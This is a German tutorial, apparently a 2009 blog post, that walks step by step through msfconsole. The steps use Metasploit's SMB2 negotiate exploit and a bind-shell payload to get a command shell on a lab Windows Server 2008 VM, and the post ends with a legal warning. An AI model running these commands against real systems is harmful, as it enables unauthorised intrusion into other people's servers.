Hey Leute,
ich habe ein kleines Tutorial geschrieben für Metasploit. Speziell für die Konsole ( msfconsole )
Ich verwende hier die Metasploit Version 3.3-dev. Der Stable release 3.3 ist für mitte November angekündigt.
Aber weiter zum Tutorial.
Wir starten mal msfconsole:
[BILD 1]
Als ziel verwende ich ein Windows Server 2008 Enterprise der in einer VM läuft.
Wir suchen nun in der Konsole nach einem Exploit für den Windows Server 2008.
Dies machen wir mit den Befehl:
search exploits ””windows 2008””
[BILD 2]
Als Ergebniss bekommen wir folgendes:
Name Description
—- ———–
windows/smb/smb2_negotiate_func_index Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Um jetzt diesen Exploit zu verwenden müssen wir mit dem Befehl
use windows/smb/smb2_negotiate_func_index
Metasploit sagen das wir diesen Exploit verwenden wollen.
Nun geben wir den Befehl
show options
ein
[BILD 3]
Wir sehen das RHOST noch nicht gesetzt wurde. Da müssen wir die IP des Servers eintragen.
RPORT = Ist der Port worauf der Vuln. Service lauscht.
Bei mir ist das die IP 192.168.251.136
Mit folgenden Befehl setzen wir die IP in RHOST:
set RHOST [ip]
also bei mir:
set RHOST 192.168.251.136
Wenn wir nochmal show options eingeben sehen wir das RHOST gesetzt wurde.
[BILD 4]
Als nächstes brauche wir ein Payload um hinter auf die Maschine zukommen.
Mit dem befehl:
show payloads
können wir uns die passende Payloads für den Exploit anzeigen lassen.
Als Payload nehme ich:
windows/shell_bind_tcp
[BILD 5]
Mit dem befehl
set payload windows/shell_bind_tcp
können wir den gewünschten Payload verwenden.
Nochmal mit show options gucken ob der Payload auch geladen wurde.
Der Payload wird nachdem der Exploit ausgeführt wir eine shell an den Port 444 binden.
Wir haben jetzt alles brauchbares zusammen um den Angriff zu starten.
Starten tun wir den Angriff mit dem Befehl
exploit
[BILD 6]
Wir sehen nun das eine CMD shell in der msfconsole aufgetaucht ist. Das bedeutet das wir erfolgreich auf den Windows Server 2008 eingedrungen sind.
[BILD 7]
ACHTUNG!!!!!
Natürlich braucht man die Erlaubnis des Administrators wenn man einen Server eindringen will.
Hat man diese nicht aber man macht es trotzdem begeht man eine Straftat.
Ich habe euch die sich nicht mit der Konsole von Metasploit auskennen diese nur etwas näher gebracht.
Wenn jetzt jemand meint das er mit diesem Wissen scheiße bauen muss sollte lieber raus Fußball spiele gehen. Ich hafte nicht dafür wenn ihr zu doof seid und damit eine straftat begeht ^^
Aber wenn ich fragen oder so hat könnt ihr mich gerne fragen.
freak_out [AT] phcn [DOT] de
href="http://freak.roothack.de/blog/">
![[BILD 1]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/1.png){kind=link}
![[BILD 2]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/2.png){kind=link}
![[BILD 3]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/3.png){kind=link}
![[BILD 4]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/4.png){kind=link}
![[BILD 5]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/5.png){kind=link}
![[BILD 6]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/6.png){kind=link}
![[BILD 7]](http://freak.roothack.de/blog/wp-content/uploads/2009/pics/msfc/7.png){kind=link}